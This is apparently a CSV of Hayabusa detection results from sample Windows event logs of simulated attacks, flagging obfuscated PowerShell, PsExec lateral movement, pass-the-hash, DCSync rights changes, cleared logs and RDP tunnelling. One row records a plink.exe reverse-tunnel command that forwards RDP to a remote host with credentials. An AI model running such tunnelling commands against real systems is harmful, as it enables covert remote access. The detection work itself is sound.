2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:22:37.536 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:23:59.512 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:25:40.262 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:27:04.659 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:56:34.470 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:58:22.516 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:31.974 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:01:22.441 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: blabla.exe | IP Addr: 10.0.2.16 | LID: 0x162630,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: helpdesk | Computer: evil.internal.corp | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,info,,NTLM Logon To Local Account,User: EXCHANGE$ | Computer: EXCHANGE | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,info,,Logon Type 3 - Network,User: EXCHANGE$ | Computer: EXCHANGE | IP Addr: 192.168.111.87 | LID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,,Logon Type 5 - Service,User: sshd_server | Computer: PC02 | IP Addr: - | LID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x21f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x45120 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: PC02 | IP Addr: 127.0.0.1 | LID: 0x4a26d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,info,,Logon Type 11 - CachedInteractive,User: user01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x1414c8 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,info,,Logon Type 7 - Unlock,User: user01 | Computer: PC01 | IP Addr: - | LID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: user01 | IP Address: - | Process: C:\Windows\System32\lsass.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,Evas | C2 | LatMov,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,info,,Logon Type 10 - RDP (Remote Interactive),User: admin01 | Computer: PC01 | IP Addr: 127.0.0.1 | LID: 0x14a321 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,info,,Admin Logon,User: admin01 | LID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: PC01$ | Target User: admin01 | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,LatMov,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,LatMov,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
2019-02-16 19:01:46.884 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:57182 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:01:50.699 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\plink.exe | PID: 3520 | PGUID: 365ABB72-DD79-5C67-0000-00109C931000,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test | Process: C:\Users\IEUser\Desktop\plink.exe | User: PC01\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x26656 | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfil | C2,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,C2 | LatMov,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/proc_creation_win_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:22.965 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49185 (PC01.example.corp) | Dst: 10.0.2.18:80 (PC02) | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49186 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49186 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:64763 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:02.272 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:61400 (PC01.example.corp) | Dst: 224.0.0.252:5355 () | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:47.086 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:59304 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x26656 | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:03:48.078 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\UI0Detect.exe | PID: 2504 | PGUID: 365ABB72-E004-5C67-0000-00107C9B1500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.221 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
